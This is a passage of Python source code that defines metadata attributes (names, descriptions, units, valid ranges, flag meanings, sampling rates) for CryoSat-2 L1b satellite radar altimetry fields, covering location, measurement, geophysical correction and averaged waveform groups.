L1b_location_attributes['Att_control']['flag_meanings'] = ('unknown '
'local_normal_pointing yaw_steering')
L1b_location_attributes['Att_control']['hertz'] = 20
#-- Source sequence counter
L1b_location_attributes['SSC'] = {}
L1b_location_attributes['SSC']['long_name'] = 'Source sequence counter'
L1b_location_attributes['SSC']['description'] = ('Read from the L0 echo '
		'telemetry packet (of the master channel in the case of SARin). '
'This is a 16384 cyclic modulo counter, starting from 0, incrementing '
'by 1. A separate counter is maintained for each instrument mode')
L1b_location_attributes['SSC']['hertz'] = 20
#-- Instrument configuration
L1b_location_attributes['Inst_config'] = {}
L1b_location_attributes['Inst_config']['long_name'] = ('Instrument '
'Configuration flag')
L1b_location_attributes['Inst_config']['description'] = ('This is derived '
'from flags in the L0 packets for tracking and the echo. See table '
'2.3.3-3 of the "L1b Products Format Specification" document.')
L1b_location_attributes['Inst_config']['flag_meanings'] = ('siral_redundant '
'external_cal open_loop loss_of_echo real_time_error echo_saturation '
'rx_band_attenuated cycle_report_error')
L1b_location_attributes['Inst_config']['hertz'] = 20
#-- acquisition band
L1b_location_attributes['Inst_band'] = {}
L1b_location_attributes['Inst_band']['long_name'] = 'Acquisition Band'
L1b_location_attributes['Inst_band']['description'] = ('This flag '
'contains the acquisition band of the SIRAL instrument.')
L1b_location_attributes['Inst_band']['flag_meanings'] = ('unknown '
'320_mhz 40_mhz')
L1b_location_attributes['Inst_band']['hertz'] = 20
#-- instrument channel
L1b_location_attributes['Inst_channel'] = {}
L1b_location_attributes['Inst_channel']['long_name'] = 'Rx Channel'
L1b_location_attributes['Inst_channel']['description'] = ('This flag '
'contains the SIRAL instrument channel in use.')
L1b_location_attributes['Inst_channel']['flag_meanings'] = ('unknown '
'rx1 rx2 both')
L1b_location_attributes['Inst_channel']['hertz'] = 20
#-- tracking mode
L1b_location_attributes['Tracking_mode'] = {}
L1b_location_attributes['Tracking_mode']['long_name'] = 'Tracking Mode'
L1b_location_attributes['Tracking_mode']['description'] = ('This flag '
'indicates the tracking mode of the SIRAL instrument.')
L1b_location_attributes['Tracking_mode']['flag_meanings'] = ('unknown '
'lrm sar sarin')
L1b_location_attributes['Tracking_mode']['hertz'] = 20
#-- Record Counter
L1b_location_attributes['Rec_Count'] = {}
	L1b_location_attributes['Rec_Count']['long_name'] = 'Record Counter'
L1b_location_attributes['Rec_Count']['description'] = ('Progressive counter '
'incremented by 1 for each data block. Hence the first full MDS record '
'contains the numbers 1-20, the second 21-40, etc.')
L1b_location_attributes['Rec_Count']['hertz'] = 20
#-- Lat: packed units (0.1 micro-degree, 1e-7 degrees)
L1b_location_attributes['Lat'] = {}
L1b_location_attributes['Lat']['long_name'] = 'Latitude of measurement'
L1b_location_attributes['Lat']['description'] = ('Corresponding to the '
'position at the MDSR Time Stamp')
L1b_location_attributes['Lat']['units'] = '0.1 micro-degree'
L1b_location_attributes['Lat']['valid_min'] = -9e8
L1b_location_attributes['Lat']['valid_max'] = 9e8
L1b_location_attributes['Lat']['hertz'] = 20
#-- Lon: packed units (0.1 micro-degree, 1e-7 degrees)
L1b_location_attributes['Lon'] = {}
L1b_location_attributes['Lon']['long_name'] = 'Longitude of measurement'
L1b_location_attributes['Lon']['description'] = ('Corresponding to the '
'position at the MDSR Time Stamp')
L1b_location_attributes['Lon']['units'] = '0.1 micro-degree'
L1b_location_attributes['Lon']['valid_min'] = -18e8
L1b_location_attributes['Lon']['valid_max'] = 18e8
L1b_location_attributes['Lon']['hertz'] = 20
#-- Alt: packed units (mm, 1e-3 m)
#-- Altitude of COG above reference ellipsoid
L1b_location_attributes['Alt'] = {}
L1b_location_attributes['Alt']['long_name'] = 'Altitude'
L1b_location_attributes['Alt']['description'] = ('Altitude of Satellite '
'COG above reference ellipsoid corresponding to the MDSR Time Stamp')
L1b_location_attributes['Alt']['units'] = 'millimeters'
L1b_location_attributes['Alt']['hertz'] = 20
#-- Instantaneous altitude rate derived from orbit: packed units (mm/s, 1e-3 m/s)
L1b_location_attributes['Alt_rate'] = {}
L1b_location_attributes['Alt_rate']['long_name'] = 'Altitude Rate'
L1b_location_attributes['Alt_rate']['description'] = ('Instantaneous '
'altitude rate derived from orbit corresponding to the MDSR Time Stamp')
L1b_location_attributes['Alt_rate']['units'] = 'millimeters/second'
L1b_location_attributes['Alt_rate']['hertz'] = 20
#-- Satellite velocity vector. In ITRF: packed units (mm/s, 1e-3 m/s)
#-- ITRF= International Terrestrial Reference Frame
L1b_location_attributes['Sat_velocity'] = {}
L1b_location_attributes['Sat_velocity']['long_name'] = ('Satellite velocity '
'vector')
L1b_location_attributes['Sat_velocity']['description'] = ('In the '
'International Terrestrial Reference Frame (ITRF) in the International '
'Earth Fixed System. From Orbit CFI call. This is not a unit vector as '
'the velocity magnitude is also required.')
L1b_location_attributes['Sat_velocity']['units'] = 'millimeters/second'
L1b_location_attributes['Sat_velocity']['hertz'] = 20
#-- Real beam direction vector. In CRF: packed units (micro-m, 1e-6 m)
#-- CRF= CryoSat Reference Frame.
L1b_location_attributes['Real_beam'] = {}
L1b_location_attributes['Real_beam']['long_name'] = ('Real beam direction '
'vector')
L1b_location_attributes['Real_beam']['description'] = ('In the '
'CryoSat Reference Frame (CRF). This is a unit vector.')
L1b_location_attributes['Real_beam']['units'] = 'micrometers'
L1b_location_attributes['Real_beam']['hertz'] = 20
#-- Interferometric baseline vector. In CRF: packed units (micro-m, 1e-6 m)
L1b_location_attributes['Baseline'] = {}
L1b_location_attributes['Baseline']['long_name'] = ('Interferometric '
'baseline vector')
L1b_location_attributes['Baseline']['description'] = ('In the '
'CryoSat Reference Frame (CRF). This is a unit vector.')
L1b_location_attributes['Baseline']['units'] = 'micrometers'
L1b_location_attributes['Baseline']['hertz'] = 20
#-- Star Tracker ID and Spacecraft mispointing for Baseline-C and D
if BASELINE in ('C','D'):
#-- Star Tracker ID
L1b_location_attributes['ST_ID'] = {}
L1b_location_attributes['ST_ID']['long_name'] = 'Star Tracker ID'
L1b_location_attributes['ST_ID']['hertz'] = 20
#-- Antenna Bench Roll Angle (Derived from star trackers)
#-- packed units (0.1 micro-degree, 1e-7 degrees)
L1b_location_attributes['Roll'] = {}
L1b_location_attributes['Roll']['long_name'] = ('Antenna Bench Roll '
'Angle derived from star trackers')
L1b_location_attributes['Roll']['units'] = '0.1 micro-degree'
L1b_location_attributes['Roll']['hertz'] = 20
#-- Antenna Bench Pitch Angle (Derived from star trackers)
#-- packed units (0.1 micro-degree, 1e-7 degrees)
L1b_location_attributes['Pitch'] = {}
L1b_location_attributes['Pitch']['long_name'] = ('Antenna Bench Pitch '
'Angle derived from star trackers')
L1b_location_attributes['Pitch']['units'] = '0.1 micro-degree'
L1b_location_attributes['Pitch']['hertz'] = 20
#-- Antenna Bench Yaw Angle (Derived from star trackers)
#-- packed units (0.1 micro-degree, 1e-7 degrees)
L1b_location_attributes['Yaw'] = {}
L1b_location_attributes['Yaw']['long_name'] = ('Antenna Bench Yaw '
'Angle derived from star trackers')
L1b_location_attributes['Yaw']['units'] = '0.1 micro-degree'
L1b_location_attributes['Yaw']['hertz'] = 20
#-- Measurement Confidence Data Flags
L1b_location_attributes['MCD'] = {}
L1b_location_attributes['MCD']['long_name'] = ('Measurement Confidence '
'Data Flags')
L1b_location_attributes['MCD']['description'] = ('Generally the MCD flags '
'indicate problems when set. If MCD is 0 then no problems or non-nominal '
'conditions were detected. Serious errors are indicated by setting bit 31')
L1b_location_attributes['MCD']['flag_meanings'] = ('block_degraded '
'blank_block datation_degraded orbit_prop_error orbit_file_change '
'orbit_gap echo_saturated other_echo_error sarin_rx1_error '
'sarin_rx2_error window_delay_error agc_error cal1_missing '
'cal1_default doris_uso_missing ccal1_default trk_echo_error '
'echo_rx1_error echo_rx2_error npm_error cal1_pwr_corr_type '
'phase_pert_cor_missing cal2_missing cal2_default power_scale_error '
'attitude_cor_missing phase_pert_cor_default')
L1b_location_attributes['MCD']['hertz'] = 20
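	#-- Editorial note (sketch): the description above states that serious errors
	#-- are indicated by setting bit 31 of the MCD word. Assuming bit 31 is the
	#-- most significant bit of a 32-bit flag, such a check could look like:
	#--     serious_error = (MCD >> 31) & 1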
#-- CryoSat-2 Measurement Group
L1b_measurement_attributes = {}
#-- Window Delay reference (two-way) corrected for instrument delays
L1b_measurement_attributes['TD'] = {}
L1b_measurement_attributes['TD']['long_name'] = 'Window Delay'
L1b_measurement_attributes['TD']['description'] = ('Window delay from the '
'telemetry converted to physical units. This is a 2-way measurement: '
		'the time taken for the radar pulse to travel to the surface and back. '
'COM offset is applied and Calibration correction from CAL1 is applied')
L1b_measurement_attributes['TD']['units'] = 'picoseconds'
L1b_measurement_attributes['TD']['hertz'] = 20
#-- H0 Initial Height Word from telemetry
L1b_measurement_attributes['H_0'] = {}
L1b_measurement_attributes['H_0']['long_name'] = 'H0 Initial Height Word'
L1b_measurement_attributes['H_0']['units'] = '48.8 ps'
L1b_measurement_attributes['H_0']['hertz'] = 20
#-- COR2 Height Rate: on-board tracker height rate over the radar cycle
L1b_measurement_attributes['COR2'] = {}
L1b_measurement_attributes['COR2']['long_name'] = 'COR2 Height Rate'
L1b_measurement_attributes['COR2']['description'] = ('On-board tracker '
'height rate over the radar cycle')
L1b_measurement_attributes['COR2']['units'] = '3.05 ps/rc'
L1b_measurement_attributes['COR2']['hertz'] = 20
#-- Coarse Range Word (LAI) derived from telemetry
L1b_measurement_attributes['LAI'] = {}
L1b_measurement_attributes['LAI']['long_name'] = 'Coarse Range Word'
L1b_measurement_attributes['LAI']['units'] = '12.5 ns'
L1b_measurement_attributes['LAI']['hertz'] = 20
#-- Fine Range Word (FAI) derived from telemetry
L1b_measurement_attributes['FAI'] = {}
L1b_measurement_attributes['FAI']['long_name'] = 'Fine Range Word'
L1b_measurement_attributes['FAI']['units'] = '12.5/256 ns'
L1b_measurement_attributes['FAI']['hertz'] = 20
#-- Automatic Gain Control Channel 1: AGC gain applied on Rx channel 1.
#-- Gain calibration corrections are applied (Sum of AGC stages 1 and 2
#-- plus the corresponding corrections) (dB/100)
L1b_measurement_attributes['AGC_CH1'] = {}
L1b_measurement_attributes['AGC_CH1']['long_name'] = ('Automatic Gain '
'Control Channel 1')
L1b_measurement_attributes['AGC_CH1']['description'] = ('AGC gain applied '
'on Rx channel 1. Gain calibration corrections are applied (Sum of AGC '
'stages 1 and 2 plus the corresponding corrections)')
L1b_measurement_attributes['AGC_CH1']['units'] = 'dB/100'
L1b_measurement_attributes['AGC_CH1']['hertz'] = 20
#-- Automatic Gain Control Channel 2: AGC gain applied on Rx channel 2.
#-- Gain calibration corrections are applied (dB/100)
L1b_measurement_attributes['AGC_CH2'] = {}
L1b_measurement_attributes['AGC_CH2']['long_name'] = ('Automatic Gain '
'Control Channel 2')
L1b_measurement_attributes['AGC_CH2']['description'] = ('AGC gain applied '
'on Rx channel 2.')
L1b_measurement_attributes['AGC_CH2']['units'] = 'dB/100'
L1b_measurement_attributes['AGC_CH2']['hertz'] = 20
#-- Total Fixed Gain On Channel 1: gain applied by the RF unit. (dB/100)
L1b_measurement_attributes['TR_gain_CH1'] = {}
L1b_measurement_attributes['TR_gain_CH1']['long_name'] = ('Total Fixed Gain '
'On Channel 1')
L1b_measurement_attributes['TR_gain_CH1']['description'] = ('Gain applied '
'by the RF unit.')
L1b_measurement_attributes['TR_gain_CH1']['units'] = 'dB/100'
L1b_measurement_attributes['TR_gain_CH1']['hertz'] = 20
#-- Total Fixed Gain On Channel 2: gain applied by the RF unit. (dB/100)
L1b_measurement_attributes['TR_gain_CH2'] = {}
L1b_measurement_attributes['TR_gain_CH2']['long_name'] = ('Total Fixed Gain '
'On Channel 2')
L1b_measurement_attributes['TR_gain_CH2']['description'] = ('Gain applied '
'by the RF unit.')
L1b_measurement_attributes['TR_gain_CH2']['units'] = 'dB/100'
L1b_measurement_attributes['TR_gain_CH2']['hertz'] = 20
#-- Transmit Power in microWatts
L1b_measurement_attributes['TX_Power'] = {}
L1b_measurement_attributes['TX_Power']['long_name'] = 'Transmit Power'
L1b_measurement_attributes['TX_Power']['units'] = 'microWatts'
L1b_measurement_attributes['TX_Power']['hertz'] = 20
#-- Doppler range correction: Radial component (mm)
#-- computed for the component of satellite velocity in the nadir direction
L1b_measurement_attributes['Doppler_range'] = {}
L1b_measurement_attributes['Doppler_range']['long_name'] = ('Doppler range '
'correction')
L1b_measurement_attributes['Doppler_range']['description'] = ('Radial '
'component computed for the component of satellite velocity in the '
'nadir direction.')
L1b_measurement_attributes['Doppler_range']['units'] = 'mm'
L1b_measurement_attributes['Doppler_range']['hertz'] = 20
#-- Value of Doppler Angle for the first single look echo (1e-7 radians)
L1b_measurement_attributes['Doppler_angle_start'] = {}
L1b_measurement_attributes['Doppler_angle_start']['long_name'] = ('Doppler '
'angle start')
L1b_measurement_attributes['Doppler_angle_start']['description'] = ('Value '
'of Doppler Angle for the first single look echo in the stack. It is '
'the angle between: (a) direction perpendicular to the velocity '
'vector, (b) direction from satellite to surface location. The Doppler '
'angle depends on velocity vector and on geometry.')
L1b_measurement_attributes['Doppler_angle_start']['units'] = '1e-7 radians'
L1b_measurement_attributes['Doppler_angle_start']['hertz'] = 20
#-- Value of Doppler Angle for the last single look echo (1e-7 radians)
L1b_measurement_attributes['Doppler_angle_stop'] = {}
L1b_measurement_attributes['Doppler_angle_stop']['long_name'] = ('Doppler '
'angle stop')
L1b_measurement_attributes['Doppler_angle_stop']['description'] = ('Value '
'of Doppler Angle for the last single look echo in the stack. It is '
'the angle between: (a) direction perpendicular to the velocity '
'vector, (b) direction from satellite to surface location. The Doppler '
'angle depends on velocity vector and on geometry.')
L1b_measurement_attributes['Doppler_angle_stop']['units'] = '1e-7 radians'
L1b_measurement_attributes['Doppler_angle_stop']['hertz'] = 20
#-- Instrument Range Correction: transmit-receive antenna (mm)
#-- Calibration correction to range on channel 1 computed from CAL1.
L1b_measurement_attributes['TR_inst_range'] = {}
L1b_measurement_attributes['TR_inst_range']['long_name'] = ('Instrument '
'Range Correction: transmit-receive antenna')
L1b_measurement_attributes['TR_inst_range']['description'] = ('Calibration '
'correction to range on channel 1 computed from CAL1.')
L1b_measurement_attributes['TR_inst_range']['units'] = 'mm'
L1b_measurement_attributes['TR_inst_range']['hertz'] = 20
#-- Instrument Range Correction: receive-only antenna (mm)
#-- Calibration correction to range on channel 2 computed from CAL1.
L1b_measurement_attributes['R_inst_range'] = {}
L1b_measurement_attributes['R_inst_range']['long_name'] = ('Instrument '
'Range Correction: receive-only antenna')
L1b_measurement_attributes['R_inst_range']['description'] = ('Calibration '
'correction to range on channel 2 computed from CAL1.')
L1b_measurement_attributes['R_inst_range']['units'] = 'mm'
L1b_measurement_attributes['R_inst_range']['hertz'] = 20
#-- Instrument Gain Correction: transmit-receive antenna (dB/100)
#-- Calibration correction to gain on channel 1 computed from CAL1
L1b_measurement_attributes['TR_inst_gain'] = {}
L1b_measurement_attributes['TR_inst_gain']['long_name'] = ('Instrument '
'Gain Correction: transmit-receive antenna')
L1b_measurement_attributes['TR_inst_gain']['description'] = ('Calibration '
'correction to gain on channel 1 computed from CAL1.')
L1b_measurement_attributes['TR_inst_gain']['units'] = 'dB/100'
L1b_measurement_attributes['TR_inst_gain']['hertz'] = 20
#-- Instrument Gain Correction: receive-only (dB/100)
#-- Calibration correction to gain on channel 2 computed from CAL1
L1b_measurement_attributes['R_inst_gain'] = {}
L1b_measurement_attributes['R_inst_gain']['long_name'] = ('Instrument '
'Gain Correction: receive-only antenna')
L1b_measurement_attributes['R_inst_gain']['description'] = ('Calibration '
'correction to gain on channel 2 computed from CAL1.')
L1b_measurement_attributes['R_inst_gain']['units'] = 'dB/100'
L1b_measurement_attributes['R_inst_gain']['hertz'] = 20
#-- Internal Phase Correction (microradians)
L1b_measurement_attributes['Internal_phase'] = {}
L1b_measurement_attributes['Internal_phase']['long_name'] = ('Internal '
'Phase Correction')
L1b_measurement_attributes['Internal_phase']['description'] = ('Set to '
'zero due to no availability of correction until specialized FBR-L1B '
'processing.')
L1b_measurement_attributes['Internal_phase']['units'] = 'microradians'
L1b_measurement_attributes['Internal_phase']['hertz'] = 20
#-- External Phase Correction (microradians)
L1b_measurement_attributes['External_phase'] = {}
L1b_measurement_attributes['External_phase']['long_name'] = ('External '
'Phase Correction')
L1b_measurement_attributes['External_phase']['description'] = ('Taken from '
'the IPFDB file (SARIN only) to be added to the internal phase '
'correction term. The external phase correction is the temperature-'
'averaged component of external inter-channel phase difference derived '
'from phase difference sensitive antenna subsystem, waveguides and '
'instrument waveguide switches. The external phase correction does not '
'contain internal instrument temperature dependent effects of '
'calibration coupler and duplexer which are dealt with by the CAL-4 '
'signal. These CAL-4 data are processed to compute the internal phase '
'correction parameter.')
L1b_measurement_attributes['External_phase']['units'] = 'microradians'
L1b_measurement_attributes['External_phase']['hertz'] = 20
#-- Noise Power measurement (dB/100): converted from telemetry units to be
#-- the noise floor of FBR measurement echoes.
#-- Set to -9999.99 when the telemetry contains zero.
L1b_measurement_attributes['Noise_power'] = {}
L1b_measurement_attributes['Noise_power']['long_name'] = 'Noise power'
L1b_measurement_attributes['Noise_power']['description'] = ('Noise power '
'measurement converted from telemetry units to be the noise floor of '
'FBR measurement echoes. This field is set to the default value equal '
'to -9999.99 when the telemetry contains zero.')
L1b_measurement_attributes['Noise_power']['units'] = 'dB/100'
L1b_measurement_attributes['Noise_power']['_FillValue'] = -9999.99
L1b_measurement_attributes['Noise_power']['hertz'] = 20
#-- Phase slope correction (microradians)
#-- Computed from the CAL-4 packets during the azimuth impulse response
#-- amplitude (SARIN only). Set from the latest available CAL-4 packet.
L1b_measurement_attributes['Phase_slope'] = {}
L1b_measurement_attributes['Phase_slope']['long_name'] = ('Phase Slope '
'Correction')
L1b_measurement_attributes['Phase_slope']['description'] = ('Differential '
'group delay phase difference slope correction (across the whole '
'bandwidth): fixed and variable group delays introduce a phase '
'difference slope across the instrument bandwidth. Fixed elements of '
'differential group delay have been determined during ground testing '
'and characterisation and cover the elements of antenna, calibration '
'coupler, Louis waveguide. These fixed elements can be retrieved from '
'the IPFDB. Variable elements cover differences between the CAL-1 and '
'CAL-4 paths and can be computed by processing the CAL-1 and CAL-4 data. '
		'SIR_SAR_1B and SIR_LRM_1B products contain this parameter but it is set '
'to zero. Since the correction can only be made at the rate of the '
'CAL-4 which is 1 Hz and the measurement group high rate blocks are '
'provided at 20 Hz the product provides the closest in time to FBR '
'value of slope correction.')
L1b_measurement_attributes['Phase_slope']['units'] = 'microradians'
L1b_measurement_attributes['Phase_slope']['hertz'] = 20
#-- CryoSat-2 External Corrections Group
L1b_corr_attributes = {}
#-- Dry Tropospheric Correction packed units (mm, 1e-3 m)
L1b_corr_attributes['dryTrop'] = {}
L1b_corr_attributes['dryTrop']['long_name'] = 'Dry Tropospheric Correction'
L1b_corr_attributes['dryTrop']['description'] = ('Altimeter range correction'
		' due to the dry-gas component of the Earth\'s atmosphere')
L1b_corr_attributes['dryTrop']['units'] = 'millimeters'
L1b_corr_attributes['dryTrop']['hertz'] = 1
#-- Wet Tropospheric Correction packed units (mm, 1e-3 m)
L1b_corr_attributes['wetTrop'] = {}
L1b_corr_attributes['wetTrop']['long_name'] = 'Wet Tropospheric Correction'
L1b_corr_attributes['wetTrop']['description'] = ('Altimeter range correction'
		' due to the water component of the Earth\'s atmosphere')
L1b_corr_attributes['wetTrop']['units'] = 'millimeters'
L1b_corr_attributes['wetTrop']['hertz'] = 1
#-- Inverse Barometric Correction packed units (mm, 1e-3 m)
L1b_corr_attributes['InvBar'] = {}
L1b_corr_attributes['InvBar']['long_name'] = 'Inverse Barometric Correction'
L1b_corr_attributes['InvBar']['description'] = ('Altimeter range correction '
'for the depression of the ocean surface caused by the local barometric '
'pressure')
L1b_corr_attributes['InvBar']['units'] = 'millimeters'
L1b_corr_attributes['InvBar']['hertz'] = 1
#-- Dynamic Atmosphere Correction packed units (mm, 1e-3 m)
L1b_corr_attributes['DAC'] = {}
L1b_corr_attributes['DAC']['long_name'] = 'Dynamic Atmosphere Correction'
L1b_corr_attributes['DAC']['description'] = ('Altimeter range correction '
'for both the Inverse Barometric effect and the high-frequency dynamic '
'component of the wind effect on the ocean. Only one of inverse '
		'barometric correction and DAC has to be used as they are alternatives')
L1b_corr_attributes['DAC']['units'] = 'millimeters'
L1b_corr_attributes['DAC']['hertz'] = 1
#-- GIM Ionospheric Correction packed units (mm, 1e-3 m)
L1b_corr_attributes['Iono_GIM'] = {}
L1b_corr_attributes['Iono_GIM']['long_name'] = 'Ionospheric Correction'
L1b_corr_attributes['Iono_GIM']['description'] = ('Altimeter range correction '
'for the delay of the radar pulse caused by free electrons in the '
		'ionosphere. Computed from a GPS satellite-derived (GIM) map')
L1b_corr_attributes['Iono_GIM']['units'] = 'millimeters'
L1b_corr_attributes['Iono_GIM']['hertz'] = 1
#-- Model Ionospheric Correction packed units (mm, 1e-3 m)
L1b_corr_attributes['Iono_model'] = {}
L1b_corr_attributes['Iono_model']['long_name'] = 'Ionospheric Correction'
L1b_corr_attributes['Iono_model']['description'] = ('Altimeter range '
'correction for the delay of the radar pulse caused by free electrons '
'in the ionosphere. Computed from a simple ionospheric model.')
L1b_corr_attributes['Iono_model']['units'] = 'millimeters'
L1b_corr_attributes['Iono_model']['hertz'] = 1
#-- Ocean tide Correction packed units (mm, 1e-3 m)
L1b_corr_attributes['ocTideElv'] = {}
L1b_corr_attributes['ocTideElv']['long_name'] = 'Elastic Ocean Tide'
L1b_corr_attributes['ocTideElv']['description'] = ('Removes the effect of '
'local tide and adjusts the measurement to the mean sea surface')
L1b_corr_attributes['ocTideElv']['units'] = 'millimeters'
L1b_corr_attributes['ocTideElv']['_FillValue'] = 32767
L1b_corr_attributes['ocTideElv']['hertz'] = 1
#-- Long period equilibrium ocean tide Correction packed units (mm, 1e-3 m)
L1b_corr_attributes['lpeTideElv'] = {}
L1b_corr_attributes['lpeTideElv']['long_name'] = ('Long-Period Equilibrium '
'Ocean Tide')
L1b_corr_attributes['lpeTideElv']['description'] = ('Removes the effect of '
'the oceanic response to the single tidal forcing.')
L1b_corr_attributes['lpeTideElv']['units'] = 'millimeters'
L1b_corr_attributes['lpeTideElv']['_FillValue'] = 32767
L1b_corr_attributes['lpeTideElv']['hertz'] = 1
#-- Ocean loading tide Correction packed units (mm, 1e-3 m)
L1b_corr_attributes['olTideElv'] = {}
L1b_corr_attributes['olTideElv']['long_name'] = 'Ocean Loading Tide'
L1b_corr_attributes['olTideElv']['description'] = ('Removes the effect of '
'local tidal distortion of the Earth crust')
L1b_corr_attributes['olTideElv']['units'] = 'millimeters'
L1b_corr_attributes['olTideElv']['hertz'] = 1
#-- Solid Earth tide Correction packed units (mm, 1e-3 m)
L1b_corr_attributes['seTideElv'] = {}
L1b_corr_attributes['seTideElv']['long_name'] = 'Solid Earth Tide'
L1b_corr_attributes['seTideElv']['description'] = ('Removes the effect of '
'local tidal distortion in the Earth crust')
L1b_corr_attributes['seTideElv']['units'] = 'millimeters'
L1b_corr_attributes['seTideElv']['hertz'] = 1
#-- Geocentric Polar tide Correction packed units (mm, 1e-3 m)
L1b_corr_attributes['gpTideElv'] = {}
L1b_corr_attributes['gpTideElv']['long_name'] = 'Geocentric Polar Tide'
L1b_corr_attributes['gpTideElv']['description'] = ('Removes a long-period '
'distortion of the Earth crust caused by variations in the centrifugal '
'force as the Earth rotational axis moves its geographic location')
L1b_corr_attributes['gpTideElv']['units'] = 'millimeters'
L1b_corr_attributes['gpTideElv']['hertz'] = 1
#-- Surface Type: enumerated key to classify surface at nadir
#-- 0 = Open Ocean
#-- 1 = Closed Sea
#-- 2 = Continental Ice
#-- 3 = Land
L1b_corr_attributes['Surf_type'] = {}
L1b_corr_attributes['Surf_type']['long_name'] = 'Surface Type Flag'
L1b_corr_attributes['Surf_type']['description'] = ('Enumerated key to '
'classify surface at nadir provided by a model: (0=Open Ocean, '
'1=Closed Sea, 2=Continental Ice, 3=Land, 4-7=currently unused)')
L1b_corr_attributes['Surf_type']['hertz'] = 1
#-- Corrections Status Flag
L1b_corr_attributes['Corr_status'] = {}
L1b_corr_attributes['Corr_status']['long_name'] = 'Corrections Status Flag'
L1b_corr_attributes['Corr_status']['description'] = ('Shows correction '
'algorithms called in processing. See table 2.3.3-5 of the "L1b '
'Products Format Specification" document')
L1b_corr_attributes['Corr_status']['hertz'] = 1
#-- Correction Error Flag
L1b_corr_attributes['Corr_error'] = {}
L1b_corr_attributes['Corr_error']['long_name'] = 'Correction Error Flag'
L1b_corr_attributes['Corr_error']['description'] = ('Shows if a correction '
'algorithm returned an error when called. See table 2.3.3-6 of the '
'"L1b Products Format Specification" document')
L1b_corr_attributes['Corr_error']['hertz'] = 1
#-- CryoSat-2 Average Waveforms Groups
#-- Low-Resolution Mode (LRM)
L1b_1Hz_LRM_wfm_attributes = {}
#-- Data Record Time (MDSR Time Stamp)
L1b_1Hz_LRM_wfm_attributes['Day'] = {}
L1b_1Hz_LRM_wfm_attributes['Day']['long_name'] = 'MDSR time stamp days'
L1b_1Hz_LRM_wfm_attributes['Day']['units'] = 'days since 2000-01-01 00:00:00 TAI'
L1b_1Hz_LRM_wfm_attributes['Day']['description'] = ('Corresponding to '
'the middle of group of pulses')
L1b_1Hz_LRM_wfm_attributes['Day']['hertz'] = 1
#-- Time: second part
L1b_1Hz_LRM_wfm_attributes['Second'] = {}
L1b_1Hz_LRM_wfm_attributes['Second']['long_name'] = 'MDSR time stamp seconds'
L1b_1Hz_LRM_wfm_attributes['Second']['units'] = 'seconds'
L1b_1Hz_LRM_wfm_attributes['Second']['description'] = ('Corresponding to '
'the middle of group of pulses')
L1b_1Hz_LRM_wfm_attributes['Second']['hertz'] = 1
#-- Time: microsecond part
L1b_1Hz_LRM_wfm_attributes['Micsec'] = {}
L1b_1Hz_LRM_wfm_attributes['Micsec']['long_name'] = 'MDSR time stamp microseconds'
L1b_1Hz_LRM_wfm_attributes['Micsec']['units'] = 'microseconds'
L1b_1Hz_LRM_wfm_attributes['Micsec']['description'] = ('Corresponding '
'to the middle of group of pulses')
L1b_1Hz_LRM_wfm_attributes['Micsec']['hertz'] = 1
#-- Lat: packed units (0.1 micro-degree, 1e-7 degrees)
L1b_1Hz_LRM_wfm_attributes['Lat'] = {}
L1b_1Hz_LRM_wfm_attributes['Lat']['long_name'] = 'Latitude of measurement'
L1b_1Hz_LRM_wfm_attributes['Lat']['description'] = ('Corresponding to the '
'position at the MDSR Time Stamp')
L1b_1Hz_LRM_wfm_attributes['Lat']['units'] = '0.1 micro-degree'
L1b_1Hz_LRM_wfm_attributes['Lat']['valid_min'] = -9e8
L1b_1Hz_LRM_wfm_attributes['Lat']['valid_max'] = 9e8
L1b_1Hz_LRM_wfm_attributes['Lat']['hertz'] = 1
#-- Lon: packed units (0.1 micro-degree, 1e-7 degrees)
L1b_1Hz_LRM_wfm_attributes['Lon'] = {}
L1b_1Hz_LRM_wfm_attributes['Lon']['long_name'] = 'Longitude of measurement'
L1b_1Hz_LRM_wfm_attributes['Lon']['description'] = ('Corresponding to the '
'position at the MDSR Time Stamp')
L1b_1Hz_LRM_wfm_attributes['Lon']['units'] = '0.1 micro-degree'
L1b_1Hz_LRM_wfm_attributes['Lon']['valid_min'] = -18e8
L1b_1Hz_LRM_wfm_attributes['Lon']['valid_max'] = 18e8
L1b_1Hz_LRM_wfm_attributes['Lon']['hertz'] = 1
#-- Alt: packed units (mm, 1e-3 m)
#-- Altitude of COG above reference ellipsoid
L1b_1Hz_LRM_wfm_attributes['Alt'] = {}
L1b_1Hz_LRM_wfm_attributes['Alt']['long_name'] = 'Altitude'
L1b_1Hz_LRM_wfm_attributes['Alt']['description'] = ('Altitude of Satellite '
'COG above reference ellipsoid corresponding to the MDSR Time Stamp')
L1b_1Hz_LRM_wfm_attributes['Alt']['units'] = 'millimeters'
L1b_1Hz_LRM_wfm_attributes['Alt']['hertz'] = 1
#-- Window Delay (two-way) corrected for instrument delays
L1b_1Hz_LRM_wfm_attributes['TD'] = {}
	L1b_1Hz_LRM_wfm_attributes['TD']['long_name'] = 'Window Delay'
L1b_1Hz_LRM_wfm_attributes['TD']['description'] = ('Window Delay '
'(two-way) from the telemetry corrected for instrument delays')
L1b_1Hz_LRM_wfm_attributes['TD']['units'] = 'picoseconds'
L1b_1Hz_LRM_wfm_attributes['TD']['hertz'] = 1
#-- 1 Hz Averaged Power Echo Waveform
L1b_1Hz_LRM_wfm_attributes['Waveform'] = {}
L1b_1Hz_LRM_wfm_attributes['Waveform']['long_name'] = 'Averaged Power Echo'
L1b_1Hz_LRM_wfm_attributes['Waveform']['description'] = ('Array of 128 bins. '
'Averaged from all individual L0 echoes in approx 1 second (20 for LRM). '
'Converted to Watts by using the scaling parameters. Power in Watts = '
'counts*(A*1e-9)*2^B')
L1b_1Hz_LRM_wfm_attributes['Waveform']['valid_min'] = 0
L1b_1Hz_LRM_wfm_attributes['Waveform']['valid_max'] = 65535
L1b_1Hz_LRM_wfm_attributes['Waveform']['hertz'] = 1
#-- Echo Scale Factor (to scale echo to watts)
L1b_1Hz_LRM_wfm_attributes['Linear_Wfm_Multiplier'] = {}
L1b_1Hz_LRM_wfm_attributes['Linear_Wfm_Multiplier']['long_name'] = ('Echo '
'Scale factor "A"')
L1b_1Hz_LRM_wfm_attributes['Linear_Wfm_Multiplier']['description'] = ('"A" '
'Parameter to scale echo to Watts. Power in Watts = counts*(A*1e-9)*2^B')
L1b_1Hz_LRM_wfm_attributes['Linear_Wfm_Multiplier']['hertz'] = 1
#-- Echo Scale Power (a power of 2 to scale echo to Watts)
L1b_1Hz_LRM_wfm_attributes['Power2_Wfm_Multiplier'] = {}
L1b_1Hz_LRM_wfm_attributes['Power2_Wfm_Multiplier']['long_name'] = ('Echo '
